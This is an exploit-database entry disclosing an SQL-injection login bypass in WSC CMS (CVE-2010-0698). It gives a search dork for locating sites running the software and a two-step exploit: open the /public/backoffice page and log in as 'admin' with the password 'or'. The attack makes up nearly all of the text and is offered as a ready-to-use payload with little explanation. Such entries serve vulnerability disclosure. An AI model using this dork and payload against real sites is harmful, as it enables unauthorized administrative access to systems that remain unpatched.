WSC CMS (Bypass) SQL Injection Vulnerability



EDB-ID: 11507 CVE: 2010-0698 OSVDB-ID: 62476
Author: Phenom Published: 2010-02-19 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
------------------------------------------------------
------------------------------------------------------

 _____  _                                
|  __ \| |                               
| |__) | |__   ___ _ __   ___  _ __ ___  
|  ___/| '_ \ / _ \ '_ \ / _/\| '_ ` _ \              
| |    | | | |  __/ | | | (_) | | | | | |             
|_|    |_| |_|\___|_| |_|\/__/|_| |_| |_|             

                                                      
------------------------------------------------------
------------------------------------------------------

############### WSC CMS (Bypass) SQL Injection Vulnerability ###################################
#
#       Author : Phenom
#       
#       mail : sys.phenom.sys[at]gmail[dot]com
#
#       Dork : Realizzato con WSC CMS  by Dynamicsoft 
#
################################################################################################

####### Exploit ################################################################################
#
#     1- http://server/public/backoffice 
# 
#     2- login with "admin" as user name and 'or' as password 
#
################################################################################################